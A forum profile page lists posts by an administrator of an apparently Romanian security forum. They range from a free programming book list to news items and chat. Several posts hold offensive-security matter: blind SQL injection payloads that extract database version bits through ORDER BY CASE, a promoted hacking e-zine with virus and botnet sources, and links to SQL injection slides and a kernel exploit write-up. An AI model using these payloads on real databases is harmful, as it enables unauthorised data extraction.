Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. Good guy TheTime
  2. [h=2]A Huge List of Free Books[/h] [h=3]Graphics Programming[/h] GPU Gems GPU Gems 2 - ch 8,14,18,29,30 as pdf GPU Gems 3 Graphics Programming Black Book ShaderX series DirectX manual (draft) Learning Modern 3D Graphics Programming (draft) [h=3]Language Agnostic[/h] Object-Oriented Reengineering Patterns Foundations of Programming Computer Musings (lectures by Donald Knuth) The Cathedral and the Bazaar Patterns and Practices: Application Architecture Guide 2.0 Security Engineering Digital Signal Processing For Engineers and Scientists Getting Real Domain Driven Design Quickly OO Design Best Kept Secrets of Peer Code Review NASA Software Measurement Handbook NASA Manager Handbook for Software Development (PDF) Introduction to Functional Programming (class lectures and slides) How to Design Programs Guide to the Software Engineering Body of Knowledge Online Course Materials Algorithms (draft) Data Structures and Algorithms Essential Skills for Agile Development Programming Languages: Application and Interpretation Learn to Program Patterns of Software: Tales from the Software Community (PDF) How to write Unmaintainable Code The Art of Unix Programming The Definitive Guide to Building Code Quality How to Think Like a Computer Scientist Planning Algorithms Mathematical Logic - an Introduction (PDF) An Introduction to the Theory of Computation Developers Developers Developers Developers (broken download link?) Linkers and loaders Let's Build a Compiler Producing Open Source Software How to Write Parallel Programs Don't Just Roll the Dice 97 Things Every Programmer Should Know How Computers Work Introduction to Information Retrieval Is Parallel Programming Hard, And, If So, What Can You Do About It? Matters Computational Type Theory and Functional Programming Getting started with Open source development (PDF) Database Fundamentals (PDF) Clever Algorithms Summary of the GoF Design Patterns Flow based Programming Algorithms and Data-Structures (PDF) Compiler Construction (PDF) Project Oberon (PDF) The Little Book of Semaphores Essential Skills for Agile Development I Am a Bug Mining of Massive Datasets Data-Intensive Text Processing with MapReduce (PDF) Understanding IP Addressing: Everything you ever wanted to know (PDF) Operating Systems and Middleware (PDF and LaTeX) Think Stats: Probability and Statistics for Programmers (PDF, code written in Python) The Architecture of Open Source Applications [h=3]ASP.NET MVC[/h] NerdDinner Walkthrough [h=3]Assembly Language[/h] ProgrammingGroundUp (PDF) Paul Carter's Tutorial on x86 Assembly Software optimization resources by Agner Fog [h=3]Bash[/h] Advanced Bash-Scripting Guide Lhunath's Bash Guide [h=3]C / C++[/h] The new C standard - an annotated reference Matters Computational: Ideas, Algorithms, Source Code, by Jorg Arndt The C book Thinking in C++, Second Edition C++ Annotations Software optimization resources by Agner Fog Introduction to Design Patterns in C++ with Qt 4 (PDF) Object Oriented Programming in C (PDF) Beej's Guide to Network Programming Learn C the hard way Also see: The Definitive C++ Book Guide and List [h=3]C#[/h] C# School (covers C# 1.0 and 2.0) Threading in C# C# Yellow Book (intro to programming) C# Programming - Wikibook C# Essentials Data Structures and Algorithms with Object-Oriented Design Patterns in C# Illustrated C# 2008 (.zip, dead link) [h=3]Clojure[/h] Clojure Programming [h=3]ColdFusion[/h] CFML In 100 Minutes [h=3]DB2[/h] Getting started with IBM Data Studio for DB2 (PDF) Getting started with IBM DB2 development (PDF) Getting started with DB2 Express-C (PDF) [h=3]Delphi / Pascal[/h] Essential Pascal Version 1 and 2 The Tomes of Delphi [h=3]Django[/h] Djangobook.com [h=3]Erlang[/h] Learn You Some Erlang For Great Good [h=3]Flex[/h] Getting started with Adobe Flex (PDF) [h=3]F#[/h] The F# Survival Guide F Sharp Programming in Wikibooks Real World Functional Programming (MSDN Chapters) [h=3]Forth[/h] Starting Forth Thinking Forth [h=3]Git[/h] Pro Git The Git Community Book Git From The Bottom Up (PDF) [h=3]Grails[/h] Getting Start with Grails [h=3]Haskell[/h] Learn You a Haskell Real World Haskell [h=3]HTML / CSS[/h] Dive Into HTML5 HTML Dog Tutorials [h=3]Java[/h] Sun's Java Tutorials Thinking in Java How to Think Like a Computer Scientist Java Thin-Client Programming OSGi in Practice (PDF) Java 6 Tutorial (PDF) [h=3]JavaScript[/h] Eloquent JavaScript Crockford's JavaScript jQuery Fundamentals (starts with JavaScript basics) Mozilla Developer Network's JavaScript Guide Essential Javascript & jQuery Design Patterns for Beginners JavaScript (Node.js specific) Up and Running with Node The Node Beginner Book Mastering Node.js [h=3]Latex[/h] The Not So Short Introduction to LATEX (perfect for beginners) [h=3]Linux[/h] Advanced Linux Programming [h=3]Lisp[/h] COMMON LISP: An Interactive Approach A Short Course in Common Lisp Structure And Interpretation of Computer Programs A Gentle Introduction to Symbolic Computation (PDF) Practical Common Lisp On Lisp ANSI Common Lisp Common Lisp the Language, 2nd Edition Successful Lisp Let Over Lambda - 50 Years of Lisp Natural Language Processing in Lisp [h=3]Lua[/h] Programming In Lua (for v5 but still largely relevant) Lua Programming Gems (not entirely free, but has a lot of free chapters and accompanying code) [h=3]Maven[/h] Better Builds with Maven Maven by Example Maven: The Complete Reference Repository Management with Nexus Developing with Eclipse and Maven [h=3]Mercurial[/h] Mercurial: The Definitive Guide HGInit - Mercurial Tutorial by Joel Spolsky [h=3]Nemerle[/h] Nemerle [h=3].NET[/h] C# School (covers C# 1.0 and 2.0) Visual Studio Tips and Tricks (VS 2003-2005 only) Entity Framework Charles Petzold's .NET Book 0 Threading in C# C# Yellow Book (intro to programming) C# Programming - Wikibook C# Essentials Data Structures and Algorithms with Object-Oriented Design Patterns in C# Nemerle [h=3]NoSQL[/h] CouchDB: The Definitive Guide The Little MongoDB Book [h=3]Oberon[/h] Programming in Oberon (PDF) [h=3]Objective-C[/h] The Objective-C Programming Language [h=3]OCaml[/h] Unix System Programming in OCaml Introduction to OCaml (PDF) [h=3]Oracle Server[/h] Oracle's Guides and Manuals [h=3]Oracle PL/SQL[/h] PL/SQL Language Reference PL/SQL Packages and Types Reference Steven Feuerstein's PL/SQL Obsession - Videos and Presentations [h=3]Parrot / Perl 6[/h] Using Perl 6 (work in progress) [h=3]Perl[/h] Higher-Order Perl Perl The Hard Way Extreme Perl Perl Free Online EBooks (meta-list) The Mason Book Practical mod_perl Beginning Perl Embedding Perl in HTML with Mason Perl & LWP Perl for the Web Web Client Programming with Perl Modern Perl 5 [h=3]PHP[/h] Symfony2 Practical PHP Programming (wiki containing O'Reilly's PHP In a Nutshell) Zend Framework: Survive the Deep End [h=3]PowerShell[/h] Mastering PowerShell [h=3]Prolog[/h] Building Expert Systems in Prolog Adventure in Prolog Prolog Programming A First Course Logic, Programming and Prolog (2ed) Introduction to Prolog for Mathematicians Learn Prolog Now! Natural Language Processing in Prolog Natural Language Processing Techniques in Prolog Prolog techniques Applications of Prolog Simply logical [h=3]PostgreSQL[/h] Practical PostgreSQL [h=3]Python[/h] Byte of Python Building Skills in Python Version 2.5 Python Bibliotheca Think Python (PDF) Data Structures and Algorithms in Python Dive into Python How to Think Like a Computer Scientist: Learning with Python Python for Fun Invent Your Own Computer Games With Python Learn Python The Hard Way Thinking in Python The Django Book Snake Wrangling For Kids Natural Language Processing with Python [h=3]R[/h] The R Manuals The R Language R by example Computational Statistics, Jeremy Penzer [h=3]Ruby[/h] Programming Ruby Why's (Poignant) Guide to Ruby (mirror) Mr. Neighborly's Humble Little Ruby Book Ruby Best Practices MacRuby: The Definitive Guide Learn Ruby the hard way [h=3]Ruby on Rails[/h] Ruby on Rails Tutorial: Learn Rails By Example [h=3]Scala[/h] Programming in Scala, First Edition A Scala Tutorial for Java programmers (PDF) Scala By Example (PDF) Programming Scala Xtrace (Github) Lift (Github) Pro Scala: Monadic Design Patterns for the Web Exploring Lift (published earlier as "The Definitive Guide to Lift", PDF) [h=3]Scheme[/h] The Scheme Programming Language (Edition 4) [h=3]Smalltalk[/h] Free Online Smalltalk Books (meta-list) Squeak By Example (Smalltalk IDE) [h=3]Subversion[/h] Subversion Version Control (PDF) Version Control with Subversion [h=3]SQL[/h] Developing Time-Oriented Database Applications in SQL Use The Index, Luke! (a guide to SQL database performance for developers) Learn SQL The Hard Way [h=3]Vim[/h] A Byte of Vim Vim Recipes [h=3]Emacs[/h] An Introduction to Programming in Emacs Lisp (Third Edition) GNU Emacs manual Sursa: Become a Programmer, Motherfucker
  3. Motherfucking Website http://motherfuckingwebsite.com/
  4. Asta e gen: http://google.ro wget Dai comanda: g++ --help Si vezi ce inseamna "-o" ala. PS: L-am pus din greseala in aceasta categorie, dar acum vedem si noi cine reuseste sa "rooteze" ceva
  5. 1024-bit RSA encryption cracked by carefully starving CPU of electricity BY Sean Hollister 3 years ago Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, as it were) at the University of Michigan claim they can break it simply by tweaking a device's power supply. By fluctuating the voltage to the CPU such that it generated a single hardware error per clock cycle, they found that they could cause the server to flip single bits of the private key at a time, allowing them to slowly piece together the password. With a small cluster of 81 Pentium 4 chips and 104 hours of processing time, they were able to successfully hack 1024-bit encryption in OpenSSL on a SPARC-based system, without damaging the computer, leaving a single trace or ending human life as we know it. That's why they're presenting a paper at the Design, Automation and Test conference this week in Europe, and that's why -- until RSA hopefully fixes the flaw -- you should keep a close eye on your server room's power supply. Sursa: 1024-bit RSA encryption cracked by carefully starving CPU of electricity Nu e chiar o "stire" dar e interesanta abordarea.
  6. Da, merge pe toate versiunile de kernel. Am incercat pe CentOS, RedHat si Arch si pe 32 si pe 64 de biti. Adica merge pe toate, de aia ii zice "CTF". Iei root pe orice.
  7. Exista doar 2 tipuri de persoane (daca vreti, "hackeri negri") care fac bani: 1. Cei care fura date bancare (nicio legatura cu termenul "hacker") 2. Cei care scriu exploit-uri, le pun in exploitkit-uri si le vand pe blackmarket (adevaratii "hackeri negri") Restul sunt niste pule-blege care fac si ei cate un cacat pentru a supravietui de pe o zi pe alta. Multi de aici faceti chestii pe care ziceti ca le fac "hackerii negri". Cati ati facut peste 10.000 de euro astfel? Faceti o comparatie intre: 1. Anonymous care a obtinut acces la diverse rahaturi mai mari sau mai mici 2. Cei care participa la programe bug bounty Cati bani au facut anonimusii astfel? E doar un exemplu.
  8. Doar de curiozitate, nu esti in Romania? Pentru ceilalti, in caz ca va plangeti de taxa: 1. Pentru organizare e nevoie de bani. Banii nu pica din cer. 2. Taxa e mica, mai ales pentru studenti. 3. Daca nu mai fumezi o saptamana ai banii de taxa. 4. Daca nu iesi 2 nopti la bere ai banii de taxa. 5. Daca nu iti cumperi telefon de 2000 RON ai bani de taxa. 6. Daca nu iti cumperi mouse de gaming ai bani de taxa. Pana la urma totul tine de voi. Daca chiar sunteti pasionati, veniti. Daca nu, ramaneti acasa, bagati un GTA/FIFA/CS si va aduceti aminte de acest topic cand imi puneti sosuri in shaorma.
  9. Nu le mai dati COAILI v7.1 ca poate distrug RST astia mici...
  10. Galaxy S3 era zilele trecute 1700 RON la emag si 1600 RON pe cel.ro. Azi cica era redus de la 2000 RON la 1500 RON. Practic, reducerile cred ca rareori trec de 10%. O sa imi iau si eu tigai si bormasina, ca tot romanu, nu imi trebuie, dar sunt la oferta... Sau cel putin asa zice toata lumea.
  11. CSAW CTF 2013 Kernel Exploitation Challenge Table of Contents Introduction Understanding the Code Tracing the Vulnerable Code Path Leveraging the Vulnerability Circumventing Additional Obstacles Achieving Local Privilege Escalation Exploit Proof of Concept Bonus Points Introduction CSAW CTF 2013 was last weekend, and this year I was lucky enough to be named a judge for the competition. I decided to bring back the Linux kernel exploitation tradition of previous years and submitted the challenge “Brad Oberberg.” Four of the 15 teams successfully solved the challenge. Each team was presented with unprivileged access to a live VM running 32-bit Ubuntu 12.04.3 LTS. The vulnerable kernel module csaw.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag. Source code to the kernel module was provided to each team, and may be viewed below (or downloaded here). Sursa: CSAW CTF 2013 Kernel Exploitation Challenge | Michael Coppola's Blog E cu rezolvari.
  12. [h=1]Winamp shutting down after over 15 years[/h]By Jacob Kastrenakes on November 20, 2013 02:42 pm The famous media player Winamp will shut down next month, over 15 years after its initial release. Though Winamp eventually lost popularity, in the late '90s and early 2000s it was one of the go-to media players for listening to local music or radio streams. In 2002, Winamp's maker, Nullsoft, was acquired by AOL for over $80 million in stock, where it's remained in development until now. A Mac and an Android version were even released in recent years, though they never found the same fan base that its customizable Windows client did. No reason is given for Winamp's shutdown, but its popularity has certainly waned: simple, built-in audio solutions like iTunes are now ubiquitous across platforms, making Winamp a far more specialized app. In a retrospective published last year, Ars Technica reported that Winamp had existed for years on life support, but that those involved didn't believe it was dead yet. Now that it's nearly gone, those who want to relive old times should head over to Winamp's site before December 21st, when it'll no longer be available — its famous motto, of course, will always live on somewhere. Sursa: Winamp shutting down after over 15 years | The Verge Ce viata de cacat.
  13. Nytro

    Fun stuff

    LiveLeak.com - 100.000 euro Hackers
  14. Daca e cineva dornic (si este din Bucuresti) imi poate da PM. Ar fi de preferat cineva cu experienta.
  15. [h=1]Google Engineering: Why does Google prefer the Java stack for its products instead of Python?[/h] Robert Love, Google Software Engineer and Manager on Web Search. Man, I cannot imagine writing let alone maintaining a large software stack in Python. We use C++, Go, and Java for production software systems, with Python employed for scripting, testing, and tooling. There are a bunch of reasons for the primacy of C++ and Java: Familiarity. Early Googlers were well-versed in C++. Performance. Java can be faster than Python; C++ can be faster than Java. Tooling. Tools for debugging, profiling, and so on are significantly better for Java than Python. Even C++ is easier to debug and understand in large systems. Concurrency. As you can imagine, Google systems are highly parallelized and many are highly threaded. Threading in Python is an unmitigated disaster. The global interpreter lock (GIL) is a giant pain in the ass. Lack of need for the prototyping prowess of Python. One commonly-cited strength of Python is that it is easier to rapidly prototype small systems in Python than Java and (to an even greater extent) C++. At Google, however, this benefit isn't all that appealing: We have a lot of powerful frameworks that make prototyping or extending existing systems easy. Folks tend to prototype by gluing a hack into an existing server rather than build an entirely new distributed system. Don't get me wrong, in the war of Perl versus Python, I come down on the side of Python. But I would never use it to build a production, scalable, mission critical, performant system—particularly one someone else may need to understand some day long in the future. Sursa: Robert Love's answer to Google Engineering: Why does Google prefer the Java stack for its products instead of Python? - Quora
  16. Felicitari Alexandru, ti-ai facut numele, pozele si ce alte cacaturi mai ai pe Facebook publice pentru un cacat de referrer.
  17. Anti - secimg.php ?
  18. Si Realitatea pulii: http://www.realitatea.net/un-roman-a-inventat-masina-de-facut-bani-cum-stoarce-legal-averi-din-banci_1320382.html
  19. Inception E-Zine #1 http://i.minus.com/iQ4CdoTgCXTr7.jpg #1 issue hacking e-zine <<Inception>>. Articles: 1.DLL Hijacking in antiviruses 2.About AV-checker 3.Miracle in a small back office 4.VX vs Commerce 5.Web security assessment planning 6.Polymorphic file virus BEETLE 7.The theory of building large p2p botnets 8.History of hacking 9.Self-rewriting executable code on LPC2388 10.Power in simplicity 11.Imported Code 12.Practical DNS-Amplification 13.Review of genetic algorithm for the example of guessing password by MD5-hash 14.Reflection: solution of "unconventional" tasks Members working on the e-zine: pr0mix Izg0y _sheva740 d3m Ar3s ALiEN Assault pest amdf FanOfGun rgb MZh XRipper KostaPC ProudPank valentin_p Versus71 aka HIMIKAT Attention: Folder <<sources>> detected AV. This not malware. It examples and source code for a better understanding of articles. They are completely safe for your PC. Download: EN: https://www.dropbox.com/s/9f1wrvpvzblcf25/inception_en.zip RU: https://www.dropbox.com/s/hm6b2pkj5ib8r38/inception_ru.zip Via: Inception E-Zine #1
  20. Advanced SQL Injection Presented By: Joe McCray joe - learnsecurityonline.com http://twitter.com/j0emccray Joe McCray | LinkedIn Step 1: Tell customer you are 31337 security professional Customers only applied patches if it fixed something on the system It was common practice NOT to apply system updates that didn't fix a problem you were experiencing on a system (WTF ARE YOU DOING -YOU MIGHT BREAK SOMETHING!!!!!) Step 2: Scan customer network with ISS or Nessus if you were a renegade Customers didn't apply patches, and rarely even had firewalls and IDSs back then You know you only ran ISS because it had nice reports... Step 3: Break out your uber 31337 warez and 0wn it all!!!!! You only kept an exploit archive to save time (Hack.co.za was all you needed back then) If you could read the screen you could 0wn the network!!!!!!! Download: [URL]https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf[/URL]
  21. Money-making machine cashes in on currency trades By Mark Ward Technology correspondent, BBC News Dr Furtuna built a machine to read security codes on bank authentication devices A money-making machine that exploits rounding errors in currency exchanges in favour of bank customers has been built by a security researcher. If left to run at its top speed, the device could generate almost 70 euros (£58) a day by carrying out thousands of small transactions. The device was built to test the security of online banking systems. However, said experts, banks' anti-fraud systems would probably prevent the machine cashing in. Tiny trades The device was created by Romanian security researcher Dr Adrian Furtuna, who noticed what happened when certain amounts of Romanian leu were exchanged for euros. These transactions were rounded up in a customer's favour so they ended up with cash worth slightly more than they started with. "The trick is that users can choose the amounts that they want to exchange such that the rounding will be always done in their favour," Dr Furtuna told the BBC. The amounts involved are so small, 0.005 of a euro, that thousands of transactions are needed to generate a significant amount of money. Dr Furtuna, who works for KPMG Romania as a security analyst, set out to see if banks' online currency trading systems were vulnerable to large scale exploitation of this rounding error. The machine was needed because many banks use authentication gadgets to secure online transactions. These devices typically generate a short sequence of numbers that must be entered alongside other credentials when moving or exchanging money online. He automated the sequence by building a machine that could press buttons on the security device and read the code it generated as part of the authentication process. The response rate of the device limited the number of transactions that could be carried out, Dr Furtuna told the BBC. At most, he said, it could carry out 14,400 transactions per day. This means, at most, it could generate about 68 euros per day if left to run unchallenged. So far the device has been only proven to work in the lab, as the bank that asked Dr Furtuna to test its security did not give him permission to try it against its live online banking system. Swapping Romanian leu for euros let the machine cash in Separate research had shown that the online systems of at least five banks in Romania might be vulnerable to the money-machine attack, he said. Other banks in other nations might also be susceptible, he added. "Banks believe that nobody can do a high number of transactions in a feasible time since each transaction requires to be signed using the [authentication] device," he said. "By building this machine I proved that this assumption is wrong and transactions can be automated with or without an [authenticator]." Tod Beardsley, a security engineer at Rapid7, said such "salami slicing" attacks were well known, having been depicted in films such as Superman III, Hackers and Office Space. "Salami slicing attacks are usually illegal, since they usually add up to some kind of bank or tax fraud, or run afoul of anti-money laundering laws," he added. Many banks avoided falling victim to such attacks by imposing a minimum transaction size that removed the fractional error, said Mr Beardsley. Penetration tester Charlie Svensson, from security firm Sentor, said banks' anti-fraud mechanisms would probably spot and stop anyone trying to carry out thousands of tiny trades all day, every day. "I have the feeling that he would not be the first to do this, but banks tend to take notice when money goes missing," he said. "If there's one thing that banks worry about, it's money." Sursa: BBC News - Money-making machine cashes in on currency trades Nota: Tipu' e aproape la fel de bun ca mine
  22. SQL Injection - Harder, Better, Faster, Stronger ## Retrieving ---- XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX ---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC Download: http://2011.ruxcon.org.au/assets/Presentations/2011-2/LNLJ-Harder_Better_Faster_Stronger_V1.0.pdf
  23. WINdows Packet CAPture. E driverul care se instaleaza cu Wireshark folosit pentru sniffing. Deci instaleaza Winpcap sau Wireshark.
  24. Firefox 25.0.1 - the security update that wasn't? by Paul Ducklin on November 16, 2013 Firefox just pushed out a minor browser update, bumping its version number from 25.0 to 25.0.1. I don't allow Firefox full autonomy over my updates, preferring to use the Check but let me choose option, so I was presented with a now-familiar popup to let me know what was on offer: A security and stability update for Firefox is available: Firefox 25.0.1. It is strongly recommended that you apply this update for Firefox as soon as possible. "There's not much point," I thought, "in using Let me choose if I don't do some reading first, even though I almost always decided to board the update train at once." The Release Notes reiterated the security-related importance of the update: FIXED - 25.0.1: New security fixes can be found here [link] And the Known Vulnerabilities page listed five critical, three high and two moderate security advisories: Eagle-eyed readers, however, will notice that these look very much like the bugs that were fixed in 25.0. In fact, they are the security fixes from 25.0, all of them listed as patched on 29 October 2013. A small mystery, to be sure, but not an encouraging one for users who like to read, learn and understand more about security patches before applying them. What happened? Perhaps there weren't actually any security fixes, but Mozilla's release boilerplate just assumed that there probably would be, and warned you anyway? Or perhaps there were security fixes, but Mozilla released the update and published all the boilerplate pages before updating the pages to which they link? ? Apple takes the latter course most of the time: you get a link to a generic security page (Apple's well-known landing page HT1222) that usually only gets updated later with the link you really want. Let's hope Mozilla hasn't copied Apple's often laboured and sluggish disclosure strategy. What to do? As you can probably guess, I just shrugged and boarded the train. The update was only 236KB, so there wasn't a lot to it, and everything seemed to work. Is this the way of the future? In a recent Chet Chat podcast, fellow Naked Security writer Chester Wisniewski asked that very same question, albeit in a slightly different way. Chet coined the term local cloud as a light-hearted way of describing applications that you install and run locally, but which might as well not have a version number because they just update automatically over the internet, on a schedule to suit themselves. In other words, local cloud applications are like cloud apps in the sense that "you get what you get," even though they load and run offline, and you don't need to run them in a browser. Google's Chrome is as good as there already; Apple's iOS and Mozilla's Firefox are getting pretty close. Android is as good as there, too, with the added confusion that different Google partners and providers push out their updates at wildly varying times. (Some Android devices never get the latest updates at all, sometimes leaving them vulnerable indefinitely, perhaps to enormous security holes). Sursa: Firefox 25.0.1 – the security update that wasn’t? | Naked Security
×
×
  • Create New...